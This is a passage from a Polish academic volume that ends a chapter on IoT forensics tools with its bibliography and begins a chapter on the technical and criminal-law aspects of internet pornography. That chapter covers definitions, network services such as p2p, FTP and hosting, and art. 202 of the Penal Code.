ofiarą lub naszym cennym źródłem dowodów. Urządzenia elektroniczne, skoro mogą być
bronią, to ich analiza może ujawnić nowe dowody – więc nigdy ich nie ignorujmy!
Niepozorne płytki z elektroniką mogą też być cennym dowodem choć bardzo trudnym do
zbadania. Protokoły stosowane w urządzeniach IoT mogą mieć również zaskakujące
zastosowania. Pomysł sieci „Meshtastic” opartej o LoRa został oceniony jako bardzo
niebezpieczny, bo trudny do jakiejkolwiek kontroli. Urządzenia w tej sieci mogą
komunikować się bez połączenia z siecią wykorzystując właśnie sieć LoRa.
To co rezyduje w IoT to przecież skomplikowany kod w postaci binarnej.
Z różnych przyczyn, głównie licencyjnych w IoT nie tylko wykorzystujemy procesory
ARM, ale w chwili obecnej zaczyna być bardzo popularny publiczny standard instrukcji
RISC-V. Musimy więc liczyć się, że w czasie prób „reverse engineering” natkniemy się
na taki kod maszynowy.Zazwyczaj konstrukcje z mikrokontrolerami oferują tylko
wyspecjalizowaną funkcjonalność, jednak SBC takie jak Rasberry Pi 4B/5 to po prostu w
pełni rozwinięte potężne komputery o dużych możliwościach. Coraz częściej do wielu
urządzeń trafiają dedykowane procesory sztucznej inteligencji pozwalające na
autonomiczne dokonywanie obliczeń bez wykorzystania chmury. Takie rozwiązania jak
telefony Huawei czy nowe procesory Apple posiadają już dedykowane jednostki do
obsługi sztucznej inteligencji. Zmienia to dramatycznie możliwości tych urządzeń.
Wydaje się, że nawet Intel dostrzega potencjał procesorów wspierających sztuczną
inteligencję – wystarczy spojrzeć na obecne portfolio procesorów.
Zdajemy sobie sprawę, że to co zaprezentowaliśmy to jak przysłowiowa
puszka Pandory. To dopiero początek drogi, mamy o wiele więcej rzeczy w
przygotowaniu, ale jak każde badanie wymaga sporego nakładu czasu. Możliwości, które
przedstawiliśmy, są równie łatwe do wykorzystania zarówno do dobrych, jak i złych
celów. Mamy więc nadzieję, że wykorzystane zostaną zgodnie z zasadami etyki.
Świat wokół nas zmienia się w ostatnich latach w szaleńczym pędzie.
Nowe zagrożenia pojawiają się jak grzyby po deszczu. Aby efektywnie wykonywać naszą
pracę musimy ciągle się doskonalić i rozwijać. Pamiętajmy, że nie ma nic gorszego jak
fałszywe poczucie bezpieczeństwa.
169
Bibliografia
1. Projekt tap “Ninja Thrownig Star” Throwing Star LAN Tap - Great Scott
Gadgets
2. Twierdzenie Shannona-Hartleya Twierdzenie Shannona-Hartleya – Wikipedia,
wolna encyklopedia
3. Legendarny “Rubber Ducky” USB Rubber Ducky - Hak5
4. Repozytorium paylodów do Rubber Ducky GitHub - hak5/usbrubberducky-
payloads: The Official USB Rubber Ducky Payload Repository
5. Alternatywny project WiFi Ducky GitHub - spacehuhn/wifi_ducky: Upload,
save and run keystroke injection payloads with an ESP8266 + ATMEGA32U4
6. Projekt Poison Tab na Raspberry Pi Zero Samy Kamkar: PoisonTap - exploiting
locked computers over USB
7. GitHub - htr-tech/ducky: Online USB Rubber Ducky Script Converter (Arduino,
Digispark & pyautogui)
8. Konwerter skryptów do programów wykonalnych: GitHub - htr-tech/ducky:
Online USB Rubber Ducky Script Converter (Arduino, Digispark & pyautogui)
9. RF Analyzer na Adroida GitHub - demantz/RFAnalyzer: Spectrum Analyzer for
Android using the HackRF
10. Bluetooth hacking UberTooth One HackRF One - Great Scott Gadgets
11. SDR Radio “HackrfOne” HackRF One - Great Scott Gadgets
12. Projekt Meshtastic Meshtastic
170
PORNOGRAFIA W INTERNECIE - ASPEKTY TECHNICZNE ORAZ
KARNOMATERIALNE
PORNOGRAPHY ON THE INTERNET – TECHNICAL AND MATERIAL-
CRIMINAL ASPECTS
dr Filip RADONIEWICZ
1
Akademickie Centrum Polityki Cyberbezpieczeństwa
Akademia Sztuki Wojennej w Warszawie
Streszczenie
Głównym celem niniejszego opracowania jest próba przybliżenia zarówno polskiej
regulacji problematyki pornografii w internecie, jak i aspektów technicznych tego
zjawiska. W związku z tym składa się on z trzech zasadniczych części. Pierwsza ma
charakter wprowadzający do omawianej problematyki. Zawiera przede wszystkim
definicję pojęcia pornografii. W części drugiej przedstawione zostały usługi sieciowe
oraz sposoby wykorzystania ich do popełniania przestępstw związanych z pornografią.
Część trzecią poświęcono przede wszystkim przepisowi art. 202 k.k., służącemu ściganiu
przestępstw pornograficznych popełnianych w internecie.
Słowa kluczowe: pornografia, sieci p2p, hosting, chmura obliczeniowa, internet, spam,
Summary
The main purpose of this chapter is to present Polish regulations related to pornography
on the Internet and the technical aspects of this phenomenon. The article consists of three
parts. The first one is introductory. Provides definitions of pornography. In the second
part, the author presents Internet services and the possibilities of using them to commit
crimes related to pornography. The third part is devoted to Art. 202 of the Penal Code,
which aims to classify "pornographic acts" on the Internet as a crime
Keywords: dissemination, distribution, pornography, hosting, cloud computing, spam.
Wstęp
Truizmem byłoby stwierdzenie, że obecnie internet stanowi główne medium
służące udostępnianiu i rozpowszechnianiu wszelakich nielegalnych treści Wynika to z
szeregu zasadniczych czynników. Po pierwsze, z szerokiej dostępności internetu oraz z
jego globalnego zasięgu. Po drugie, łatwości umieszczenia w nim różnego rodzaju
materiałów i ch rozpowszechniania. Po trzecie, z przeświadczenia (w wielu przypadkach
– jeśli nie w większości - złudnego) o możliwości zachowania anonimowości zarówno
przez użytkowników internetu, jak i przez osoby umieszczające czy rozpowszechniające
treści, czyli sprawców przestępstw popełnianych przy jego użyciu. Tworzy to swego
1
E-mail: f.radoniewicz@ron.pl, ORCID: 0000-0002 7917-4059.
171
rodzaju iluzję pełnej poufności (a nawet „tajności”) czynności dokonywanych przez
osoby korzystające z sieci, przeradzające się nieraz w poczucie bezkarności. Po czwarte,
intensywnemu postępowi technicznemu w dziedzinie technologii teleinformatycznej nie
towarzyszy rozwój odpowiednich regulacji prawnych. Prawo nie nadąża za lawinowymi
zmianami rzeczywistości, a narzędzia, jakimi się posługuje, są mało skuteczne w walce z
naruszeniami prawa w sieci. Wzmacnia to bez wątpienia przeświadczenie o możliwości
uniknięcia odpowiedzialności karnej. Ostatnim czynnikiem - choć wcale nie najmniej
ważnym – mającym wpływ na popularność Internetu jest możliwość nieodpłatnego
korzystania z części zgromadzonych w nim materiałów pornograficznych oraz ich
wymiany między użytkownikami.
W tym miejscu wypada określić czym jest pornografia. Ponieważ kwestie
definicyjne nie stanowią przedmiotu niniejszego rozdziału, ograniczę się do przytoczenia
dwóch Według Jarosława Warylewskiego "treści pornograficzne" ("pornografia" ) to „w
rozumieniu wąskim (normatywnym) to treści zawarte w dającym się wyodrębnić
przekazie informacyjnym (prezentacji) bądź w jego istotnych i odpowiednio spójnych
fragmentach w formie materialnej lub zdematerializowanej utrwalone za pomocą
dowolnego nośnika lub nieutrwalone charakteryzujące się tym, iż przedstawiają w
jakiejkolwiek formie autentyczne lub tylko wyobrażone (wykreowane) przejawy
płciowości lub życia seksualnego człowieka w wymiarze ograniczonym (sprowadzonym)
do funkcji fizjologicznych oraz aspektów techniczno-biologicznych
2
”.
Natomiast Marek Filar i Maciej Berent definiują pornografię poprzez wskazanie
cech, jakie, występując łącznie, przesądzają, że określone treści mają pornograficzny
charakter:
1. treścią prezentacji jest przedstawienie przejawów płciowości i życia
seksualnego człowieka;
2. przedstawienie to koncentruje się wyłącznie na zaprezentowaniu jego
techniczno-biologicznych aspektów,
3. przedstawienie to zawiera ukazanie organów płciowych w ich seksualnych
funkcjach;
4. przedmiotowe aspekty prezentacji wykazują jednoznacznie, że jedyną lub
główną intencją twórcy było wywołanie u odbiorcy podniecenia seksualnego;
5. kryterium pomocniczym może być walor estetyczny danej prezentacji; im jest
on niższy, tym bardziej sugerować może ocenę danej prezentacji jako
pornograficznej
3
.
Usługi sieciowe
Zdecydowanie najpopularniejszą usługą, utożsamianą zresztą przez większość
użytkowników z internetem, jest www (World Wide Web). Została ona stworzona przez
Tima Berners-Lee, fizyka pracującego w CERN
4
w 1989 r. Opiera się na zastosowaniu
2
J. K. Warylewski, Pornografia - próba definicji [w:] Pornografia, red. M. Mozgawa, Warszawa 2011., pkt 6.
Zob też J. K. Warylewski, Pornografia dziecięca w świetle prawa krajowego, międzynarodowego i
unijnego, Państwo i Prawo 2019, nr 9, s. 112-127.
3
M. Berent, M. Filar [w:] J. Bojarski, M. Bojarski, P. Czarnecki, W. Filipkowski, O. Górniok, E. M. Guzik-
Makaruk, S. Hoc, P. Hofmański, M. Kalitowski, M. Kulik, L. K. Paprzycki, E. W. Pływaczewski, W.
Radecki, A. Sakowicz, Z. Siwik, B. J. Stefańska, R. A. Stefański, L. Tyszkiewicz, A. Wąsek, L. Wilk, M.
Filar, M. Berent, Kodeks karny. Komentarz, wyd. V, Warszawa 2016, art. 202
4
CERN to obecnie Europejska Organizacja Badań Jądrowych, fr. Organisation Europeenne pour la
Recherche Nucleaire, ale akronim CERN pochodzi od poprzedniej nazwy – Europejskiej Rady Badań
172
systemu odsyłaczy, ułatwiających poruszanie się po tekstach znacznej wielkości –
kliknięcie w odsyłacz pozwala na „przeniesienie się” do innej, określonej części danego
dokumentu. Przede wszystkim jednak rozwiązanie to zrewolucjonizowało proces
przesyłania dokumentów w sieci – zamiast załączać do wiadomości dodatkowe pliki,
wystarcza w treści zamieści odsyłacze prowadzące do określonych, znajdujących się w
sieci, dokumentów. Interaktywny odnośnik, którego kliknięcie umożliwia wykonanie
jakiejś konkretnej operacji (np. chociażby pobranie załadowanie innego dokumentu),
nazwano hiperlinkiem (hyperlink), a protokół obsługujący sieć www – http (Hypertext
Transfer Protocol)
5
. Witryny internetowe (strony) są niczym innym, jak zwykłymi
dokumentami napisanymi w języku (HTML oraz nowsze), umożliwiającym zapewnienie
ich atrakcyjności – nadanie im „multimedialnego” i interaktywnego charakteru, czemu
służyć ma umieszczanie plików dźwiękowych, animacji, filmów
6
.
Kolejną „sztandarową” usługą jest oczywiście poczta elektroniczna (e-mail).
Polega ona na przesyłaniu wiadomości między różnymi komputerami. Większość
komputerów (nie dotyczy to telefonów komórkowych, ale możliwość łączenia się za ich
pomocą z internetem te kwestia ostatnich 20 lat – a więc znacznie później niż pojawienie
się poczty elektronicznej) nie jest podłączonych do sieci bez przerwy (lub nie mają one
stałych adresów IP
7
), do przesyłania poczty używa się serwerów pocztowych, na których
przechowywane są wiadomości przed ich pobraniem na komputer użytkownika. Ich
obsługę zapewniają specjalne protokoły, z których najpopularniejszymi są: SMTP
(Simple Mail Transfer Protocol), używany do wysyłania wiadomości oraz POP3 (Post
Office Protocol version 3) i IMAP (Internet Message Access Protocol), służące do
pobierania ich z serwerów. Przesyłanie wiadomości o większej objętości, , zawierających
jako załączniki np. dokumenty, umożliwia standard MIME (Multipurpose Internet Mail
Extension)
8
.
Jednym z bardziej irytujących zjawisk w internecie jest zasypywanie skrzynek
pocztowych różnego rodzaju niechcianymi wiadomościami, czyli tzw. spamem
9
.
Wyróżnia się dwa jego rodzaje: spam komercyjny o charakterze reklamowym, czyli tzw.
niezamówione informacje handlowe (UCE – Unsolicited Commercial Email) oraz
niechciana korespondencja o charakterze niekomercyjnym
10
(UBE – Unsolicited Bulk
Email)
11
.
Jądrowych (fr. Conseil Europeen pour la Recherche Nucleaire). Jest to ośrodek badawczy znajdujący się na
przedmieściach Genewy.
5
J. Gołaczyński, Umowy elektroniczne w prawie prywatnym międzynarodowym, Warszawa, Kraków 2007, s.
19–20.
6
Zob. W. Bartkiewicz [w:] J. Papińska-Kacperek (red.), Społeczeństwo informacyjne, Warszawa 2008, s. 152 i
n.
7
Tak jest w przypadku np. dynamicznego przyznawania adresu IP przez administratora czy korzystania
zmodemu i linii telefonicznej do łączenia się z siecią (w zasadzie chyba technika już niespotykana). Zob.
szerzej F. Radoniewicz, Odpowiedzialność karna za hacking i inne przestępstwa przeciwko bezpieczeństwu
danych komputerowych i systemów informatycznych, Wolters Kluwer, Warszawa 2016, s. 62-65.
8
Szerzej np. J. Muszyński [w:] J. Chustecki et al., Vademecum teleinformatyka, Warszawa 1999, s. 232–233.
9
Wyraz „spam” tłumaczy się na różne sposoby (np. jako skrót od stupid pointless annoying messages – głupie
bezsensowne irytujące wiadomości). Natomiast w rzeczywistości termin ten pochodzi od konserwowej
mielonki i ma związek z jednym ze skeczy grupy Monty Pythona.
10
Często celem działania osób rozsyłających niechcianą pocztę, jest np. prowadzenie kampanii oszczerstw,
wyłudzenie pieniędzy w formie próśb o pomoc finansową, rozpowszechnianie wirusów lub zdobywanie za
pomocą oprogramowania szpiegującego poufnych danych z komputerów adresatów.
11
M. Pałys, M. Szymanowski, Rozwój sieci Internet – stan obecny, kierunki i prognoza rozwoju [w:] Internet
2006, Wrocław 2007, s. 32.
173
Osoby wysyłające spam uzyskują adresy kont e-mail głownie poprzez użycie
programów zwanych ekstraktorami adresów, które „wpuszczone” do internetu
automatycznie przeszukują jego zasoby (np. serwisy www, grupy dyskusyjne) w celu ich
uzyskania. Adresy można zdobyć ponadto w wyniku włamania na konto pocztowe
użytkownika internetu lub do serwera pocztowego, bądź po prostu zakupienie bazy
danych adresów (skompletowanych przez sprzedającego lub wykradzionych przez niego)
na czarnym rynku
12
. Spamerzy muszą radzić z tworzonymi tzw. czarnymi listami, na
których umieszcza się używane przez nich adresy, by później móc je blokować. Dlatego
do wysyłania spamu używa się specjalnie założonych w tym celu kont albo losowo
generowanych adresów, sfałszowanych lub należących do przypadkowych osób
13
. Do
ochrony skrzynek przed napływem spamem stosuje się filtry, których zadaniem jest
analiza treści przychodzących wiadomości, a następnie blokowania tych, które
zakwalifikują jako za niepożądane
14
.
Bardzo wiele usług sieciowych służy komunikacji międzyludzkiej, umożliwiając
wymianę informacji, czy to w formie korespondencji, czy w formie rzeczywistej
rozmowy. Do tej pierwszej grupy należy zaliczyć grupy dyskusyjne, fora internetowe,
czaty, do drugiej natomiast – komunikatory internetowe.
Grupy dyskusyjne to termin używany na określeni wielu form dyskusji w
Internecie przypominających wymianę korespondencji. Ich przykładem są są listy
dyskusyjne (polegające na automatycznym rozsyłaniu e-maili przychodzących na adres
listy do osób, które zdecydowały się na zapisanie na nią)
15
.
Podobną funkcję pełnią „czaty” (chat – rozmowa, pogawędka), czyli serwisy
internetowe służące komunikacji wielu osób w tzw. pokojach (ich wyznacznikiem jest
np. temat prowadzonych rozmów czy osoby uczestników, a same rozmowy mogą mieć
charakter prywatny - między dwoma osobami - bądź publiczny) oraz fora internetowe,
będące „przeniesieniem” grup dyskusyjnych do środowiska www.
Znacznie większe możliwości w porównaniu z wyżej opisanymi formami
komunikacji w sieci w dziedzinie stworzenia warunków rozmowy zbliżonej do realnej
dają komunikatory internetowe, takie jak np. AOL, Skype czy polskie gadu-gadu (GG).
Są to programy początkowo pozwalające na przesyłanie między użytkownikami
natychmiastowych komunikatów – umożliwiające tym samym rozmowę w czasie
rzeczywistym. Obecnie oferują możliwość przesyłania dźwięku i obrazu, umożliwiając
tym samym rozmowę „głosową” lub wideorozmowę. Aktualnie najpopularniejszymi
komunikatorami, których głównym celem jest zapewnienie możliwości tworzenia
spotkań (wideokonferencji) on – line są Zoom, Goeegle Meets oraz MS Teams.
Niezwykle popularnym niegdyś rozwiązaniem (tj. popularniejszą niż obecnie),
służącą wymianie plików pomiędzy użytkownikami internetu jest tzw. sieć peer-to-peer
(inaczej sieć komputerów równorzędnych, p2p), charakteryzująca się tym, że wszystkie
korzystające z niej komputery mają „równe prawa”. Ten sam komputer może udostępniać
pliki, a zatem pełnić rolę serwera, jak i je pobierać od innych, będąc w tej sytuacji
klientem. Innymi cechami tego systemu, które należy wskazać, jest brak centralnego
12
T. Lech, G. Podgórski [w:] J. Papińska-Kasperek, Społeczeństwo..., s. 251.
13
M. Jarski, Efektywne metody analizy treści internetowych [w:] J. Kosiński (red.), Przestępczość
teleinformatyczna. VII seminarium naukowe. Materiały seminaryjne, Szczytno 2004, s.120.
14
Zob. szerzej M. Jarski, Efektywne…, s. 120–125.
15
M. Trzaska, Pedofilia i treści zawierające pornografię dziecięcą w grupach dyskusyjnych [w:] J. Kosiński
(red.), Przestępczość teleinformatyczna. VII seminarium naukowe. Materiały seminaryjne, Szczytno 2004, s.
104–105.
174
sterowania (infrastruktury) oraz implementacja wszystkich mechanizmów zarządzania
siecią w programie-kliencie zainstalowanym na komputerze użytkownika
16
.
Użytkownik może pobierać pliki od innych internautów, jednocześnie samemu
udostępniając im wybrane przez siebie zasoby dysku twardego, tworząc w tym celu
ogólnodostępny katalog lub decydując, które foldery będą dostępne dla innych
użytkowników. W niektórych sieciach udostępnienie takie jest warunkiem korzystania,
natomiast w innych – rzutuje na status użytkownika, z którym wiąże się miejsce w kolejce
osób oczekujących na możliwość pobrania danego pliku.
Wyniki wielu badań wskazywały, że na przełomie pierwszej i drugiej dekady XXI
wieku ponad połowa generowanego w internecie ruchu związana była z systemami p2p
17
.
Obecnie są mniej popularne, z uwagi na pojawienie się alternatywnych form zdobywania
poszukiwanych plików muzycznych czy filmowych. Choć z drugiej strony, oceniając ich
obecne znaczenie nie należy zapominać, że jeden z najbardziej popularnych serwisów –
Spotify, korzysta z architektury sieci p2p.
Zasadniczo wyróżnia się dwa rodzaje systemów p2p
18
:
1. niestrukturalne, które powstały najwcześniej. Są to systemy które powstały
najwcześniej; wyróżnia się ich dwie kategorie:
• systemy pierwszej generacji – scentralizowane, wykorzystujące
centralny serwer (lub serwery) przechowujący informacje o
użytkownikach podłączonych w danej chwili do sieci oraz – w
niektórych przypadkach – o udostępnianych zasobach sieci (np.
Napster), oraz tzw. systemy „czyste” – brak w nich zarówno serwera
centralnego, jak i innych elementów (takich jak „superwęzły” w
systemach hybrydowych) tworzących infrastrukturę sieci. Ich
przykładami są Gnutella 0.4 oraz Freenet;
• systemy drugiej generacji (tzw. hybrydowe) – działające w oparciu nie
o serwery, ale o liczne „superwęzły”, którymi mogą być zwykłe
komputery podłączone do danej sieci (np. FastTrack, Gnutella 0.6).
2. strukturalne, całkowicie zdecentralizowane, bazujące na DHT
19
, których
przykładami są Kademlia, Chord czy CAN
20
.
Powyższy podział ma bardzo istotne znaczenie. Nie jest bowiem możliwe
zablokowanie przy użyciu środków prawnych ani sieci w pełni zdecentralizowanych
16
J. Dołowski, Analiza właściwości mechanizmów peer-to-peer [w:] D.J. Bem (red.), Internet 2008, Wrocław
2009, s. 83–84; sieci-p2p-generuja-najwiekszy-ruch-w-internecie” https://tech.wp.pl/sieci-p2p-generuja-
najwiekszy-ruch-w-internecie,6034814537630849a, data wejścia 3 stycznia 2024 r.
17
Zob. A. Kasprzak, K. Walkowiak, Ewolucja sieci Internet [w:] D.J. Bem (red.) Internet 2008, Wrocław
2009., s. 32–33.
18
F. Radoniewicz, Odpowiedzialność karna,… s. 73.
19
Dla zrozumienia pojęcia DHT (Distributed Hash Table – rozproszona tablica mieszająca) istotne jest
wyjaśnienie, czym jest „funkcja haszująca” (funkcja mieszająca, funkcja skrótu). Mianowicie jest to
„funkcja, która dowolnemu zbiorowi danych przyporządkowuje pewną wartość (klucz, hash, hash-kod)
będącą „skrótem” tych danych (generowanym na ich podstawie wg określonego algorytmu). Znajduje ona
zastosowanie m.in. przy tworzeniu tablic mieszających, które są strukturami składającymi się ze zbioru par:
klucz oraz wartość, której przyporządkowany jest klucz (np. klucz oraz określony plik lub adres, pod
którym jest on umieszczony), utworzonych przy pomocy funkcji haszującej. DHT jest rozproszoną strukturą
służącą do przechowywania danych, w której klucze dzielone są przez stacje robocze. W sieciach p2p
opartych na rozproszonej tablicy mieszającej taka tablica jest współdzielona przez węzły, a służy
wyszukiwaniu zasobów” (F. Radoniewicz, Odpowiedzialność karna…, s. 73 ). Zob. szerzej np. J. Dołowski,
Analiza właściwości..., s. 84–91.
20
J. Dołowski, Analiza właściwości..., s. 84–85.
175
(czyli niestrukturalnych – „czystych” z pierwszej generacji oraz strukturalnych), ani
zdecentralizowanych częściowo (czyli niestrukturalnych – hybrydowych). Związane jest
to z brakiem centralnego elementu (serwera), którego zablokowanie sparaliżowałoby całą
sieć. Niewątpliwie rację ma Jacek Gołaczyński, twierdząc, że tego typu sieci teoretycznie
mogą funkcjonować w oparciu o co najmniej dwa powiązane ze sobą komputery
21
.
Systemy p2p prężnie się rozwijały, stając się coraz sprawniejszymi i
wygodniejszymi (prostszymi w obsłudze) narzędziami służącymi wymianie plików.
Szybko pojawiła się możliwość pobierania plików z wielu źródeł jednocześnie (i vice
versa – jeden plik może być pobierany przez kilku użytkowników) we fragmentach i „na
raty” - jeśli dany plik „zniknął” z sieci, bo wylogowany został komputer, z którego
zasobów był pobierany, nie niweczy to całego procesu pobierania; jeżeli zciągany plik
pojawi się z powrotem (nawet w zasobach innego użytkownika) pobieranie może zostać
wznowione. Zazwyczaj istnieje możliwość podglądu zawartości – nie jest konieczne
pobranie całego pliku (a raczej jego fragmentu) video czy muzycznego , by go przejrzeć
(choć czasami wiąże się to z koniecznością zmiany rozszerzenia pliku).
Powszechnie przyjmuje się, że pierwszym systemem p2p był Napster (nazwa ta
odnosi się zarówno do programu, jak i sieci, z której korzysta). W 2001 r., po wniesieniu
serii pozwów, w których oskarżono serwis o naruszanie praw autorskich, wstrzymano
jego działalność do 2003 r., kiedy to ją wznowiono, ale już w wersji odpłatnej.
Interesującym rozwiązaniem służącym wymianie plików jest direct connect (DC)
opracowane przez Neo Modus Software. Najpopularniejszą aplikacją-klientem jest
DC++. Sieć ta funkcjonuje w oparciu o niewielkie serwery (tzw. hub, można spotkać się
z tłumaczeniem tego terminu jako „koncentrator”), niegromadzące żadnych danych
(nawet spisu plików klientów), a pośredniczących jedynie w przekazywaniu wyników
wyszukiwania.
22
Przykładem „czystego” systemu pierwszej generacji jest całkowicie
zdecentralizowana Gnutella (wersja 0.4). Obsługują ją takie programy klienckie jak (np.
Bearshare, Shareaza, Morpheus. Bardzo popularną siecią jest FastTrack. Jest ona
przykładem samoorganizującej się sieci dystrybucyjnej (distributing selforganisation
network). Jej specyfiką jest to, że podłączone do niej komputery, które posiadają
odpowiednią moc obliczeniową i umożliwiają odpowiednio wysoki transfer,
automatycznie stają się tzw. superwęzłami. Do jej obsługi służy Kazaa Media Desktop,
do którego prawa ma Sharman Networks. Na podobnej zasadzie jak FastTrack
funkcjonuje Gnutella w wersji 0.6. Jednym z najczęściej używanych programów typu p2p
był eDonkey2000 stworzony przez Metamachine. Obsługiwał on dwie sieci: ed2k i
Overnet (lub – od nazwy algorytmu, w oparciu o który działa – Kademlia). Metamachine
w 2006 r. w toku postępowania sądowego o naruszenie praw autorskich zostało zmuszone
do zawarcia ugody, przewidującej m.in. wstrzymanie dystrybucji eDonkey2000.
Dotychczasowi użytkownicy jednak mogli korzystać z obu sieci p2p, zarówno przy
użyciu eDonkey (jest wciąż dostępny w internecie), jak i z alternatywnych programów, z
których najpopularniejszy jest eMule.
Ciekawym sposobem wymiany plików jest protokół BitTorrent autorstwa Brama
21
J. Gołaczyński, Umowy..., s. 15.
22
M. Gramatyka, Piractwo komputerowe – sieci peer-to-peer i walka z efektami ich działania [w:] J. Widła
(red.), Wokół problematyki dokumentu: Księga pamiątkowa dedykowana Profesorowi Antoniemu Felusiowi,
Katowice 2005, s. 25; zob. szerzej L. Grabowski, K. Dobrzyński, Wykorzystanie właściwości aplikacji
DC++ (V0.691) pracującej w sieciach direct connect do identyfikacji użytkowników – studium przypadku
[w:] J. Kosiński (red.), Przestępczość teleinformatyczna: IX seminarium naukowe: materiały seminaryjne,
Szczytno 2006, s. 107–117.
176
Cohena w 2002 r. Do skorzystania z tej formy wymiany danych konieczne jest
zainstalowanie programu klienckiego („oryginalny” nazywa się też BitTorrent).
Jednocześnie jednak w procesie pobierania pewną rolę odgrywa strona internetowa.
23
Warto jeszcze wspomnieć o RapidShare. RapidShare AG jest spółką akcyjną mającą
siedzibę w Szwajcarii, będącą właścicielem rapidshare.com – strony internetowej
umożliwiającej wymianę plików. W celu skorzystania z serwisu z serwisu, należy założyć
w nim konto. Istnieją dwa rodzaje kont – nieodpłatne i płatne (RapidPro).
24
. Przyszły
użytkownik musi zaakceptować regulamin, w którym przewidziano m.in. zakaz
udostępniania w sieci plików zawierających pornografię dziecięcą. Wyszukiwanie plików
odbywa się przy pomocy forów internetowych oraz nieoficjalnych serwisów (strona
rapidshare.com nie zapewnia możliwości).
Warto przy okazji wspomnieć o rozwiązaniu, mogącym stanowić alternatywę
alternatywę dla „klasycznych” sieci p2p. Jest to sieć p2M (peer-2-Mail). Osoby z niej
korzystające podkreślają, że jest to bezpieczniejsze i bardziej zdecentralizowana forma
wymiany plików. W przypadku tego rozwiązania miejscem zawierającym zasoby
udostępniane przez użytkowników nie są to dyski twarde, ale skrzynki pocztowe, które –
jak sygnalizowano – znajdują się na serwerach. W związku z tym są dostępne dla innych
użytkowników bez przerwy w przeciwieństwie do komputerów poszczególnych osób.
25
Generalnie jest to małopopularny sposób wymiany plików.
FTP (File Transfer Protocol – protokół transferu plików) jest protokołem typu
klient-serwer, w którym pliki są przesyłane z serwera i na serwer. Do pobierania danych
z serwera oraz umieszczania ich na nim ftp służą odpowiednie programy (np. FileZilla,
Total Commander) lub zwykłe przeglądarki internetowe, które obecnie w większości
posiadają tę funkcję.. W przypadku niektórych serwerów ftp wymagana jest rejestracja w
celu uzyskania loginu i hasła. Zdecydowana większość serwerów ftp jest jednak
anonimowa
26
. W celu uzyskania dostępu do serwera należy w przeglądarce podać jego
adres w postaci URL
27
, np. ftp://ftp.politechnika.lublin.pl, oraz – ewentualnie –
uwierzytelnienia się poprzez podanie loginu i hasła.
Kolejną usługą sieciową, którą należy omówić, jest hosting polegający na
przechowywaniu przez usługodawcę danych komputerowych pochodzących od osób
trzecich (usługobiorców). Zwykle przyjmuje postać udostępnienia przez usługodawcę
zasobów własnych serwerów („miejsca” na dyskach twardych), czy też zasobów w
ramach tzw. chmury obliczeniowej przez wydzielenie na nich serwerów wirtualnych. O
sposobie ich wykorzystania decyduje usługobiorca. W zasadzie jedynym ograniczeniem
jego inwencji jest ilość przyznanej pamięci masowej. Użytkownik może zatem założyć
serwer www (i umieścić na nim strony internetowe, utworzyć np. sklep internetowy lub
23
http://www.bittorrent.com/btusers/guides/bittorrent-user-manual, data wejścia 3 stycznia 2024 r.
24
Na podstawie informacji uzyskanych na stronie rapidshare.com, data wejścia 3 stycznia 2024 r.
25
Jednym z powodów była pojemność skrzynek pocztowych, która – zwłaszcza w przypadku kont
darmowych – była zdecydowanie mniejsza niż dysków twardych, co wpływało na liczbę udostępnionych
plików. Obecnie jednak ta przeszkoda nie istnieje, gdyż większość dostawców usług nie ogranicza już
wielkości skrzynek użytkowników.
26
T.Z. Leszczyński, Nieuprawniony dostęp do ftp [w:] J. Kosiński (red.), Przestępczość teleinformatyczna,
Szczytno 2009, s. 83–85; J. Muszyński (w:) J. Chustecki et al., Vademecum teleinformatyka..., s. 234.
27
URL (Uniform Resource Locator) jest to adres lokalizujący dany zasób w Internecie. Składa się z trzech
zasadniczych części: identyfikatora usługi (np. http, ftp), nazwy domeny (czyli określenia lokalizacji
serwera, np. www.umcs.lublin.pl) oraz ze ścieżki dostępu (jest to określenie ścieżki katalogowej na
serwerze prowadzącej do pliku, np. /studia/articles.php?acid=17&mid=2&mref=15). Cały przykładowy
adres URL: http://www.umcs.lublin.pl/articles.php?acid=17&mid=2&mref=15.
177
serwis społecznościowy) czy serwer pocztowy
28
.
Podobnym rozwiązaniem, ale zapewniającym znacznie większe możliwości jest
chmura obliczeniowa. Jest to – w największym skrócie - system pozwalający
użytkownikowi na uzyskanie dostępu do zasobów serwerowych usługodawcy (w
szczególności mocy obliczeniowej, „miejsca” na nośnikach pamięci masowej,
interfejsów sieciowych) przy użyciu programu komputerowego, zapewnienie płynnego
ich skalowania w zależności od aktualnego obciążenia (w uproszczeniu – umożliwiają
usługobiorcy korzystanie z tych serwerów, które w danym momencie zapewniają
najwyższą wydajność, gdyż są najmniej obciążone). W przypadku „zwykłego” hostingu,
gdy zasoby fizyczne serwera wyczerpują się, gdyż inny serwer wirtualny znajdujący na
tym samym serwerze fizycznym (serwerach fizycznych) „rozrósł się” (zwiększył
objętość)pochłaniając w zasadzie wszystkie zasoby, użytkownik hostingu nie może
zazwyczaj liczyć na niezwłoczne przeniesienie jego danych i oprogramowania na inny
serwer (serwery), ponieważ zwykle wymaga to czasu (od kilku godzin do wielu dni).
Odmiennie przedstawia się sytuacja w przypadku chmury obliczeniowej. Użytkownik nie
jest bowiem ograniczany przez aktualną dostępność zasobów, ponieważ w sytuacji, gdy
ulegają one zmniejszeniu (np. dyski twarde grożą przepełnieniem, moc obliczeniowa
procesorów maleje z powodu wzrostu liczby usługobiorców itd.), to jego wirtualny
serwer zostaje niejako automatycznie przeniesiony na inny fizyczny serwer (lub serwery)
dysponujący w danym momencie odpowiednimi zasobami
29
.
Art. 202 Kodeksu karnego
Polski ustawodawca w kodeksie karnym z 1997 r.
30
(dalej jako k.k.), regulując
problematykę pornografii, nie uwzględnił specyfiki ani sieci komputerowych, ani – tym
bardziej – internetu. Nie zmienia to oczywiście faktu, że przepisy kodeksowe znajdują
zastosowanie w przypadku przestępstw pornograficznych popełnianych w tym
środowisku.
Czyny zabronione „dotyczące” pornografii zostały stypizowane w art. 202 k.k.:
„§ 1. Kto publicznie prezentuje treści pornograficzne w taki sposób, że może to
narzucić ich odbiór osobie, która tego sobie nie życzy,
podlega karze pozbawienia wolności do lat 3.
§ 2.(uchylony)
§ 3. Kto w celu rozpowszechniania produkuje, utrwala lub sprowadza,
przechowuje lub posiada albo rozpowszechnia lub prezentuje treści pornograficzne z
udziałem małoletniego albo treści pornograficzne związane z prezentowaniem przemocy
lub posługiwaniem się zwierzęciem, podlega karze pozbawienia wolności od lat 2 do 15.
§ 4. Kto utrwala treści pornograficzne z udziałem małoletniego, podlega karze
pozbawienia wolności od roku do lat 10.
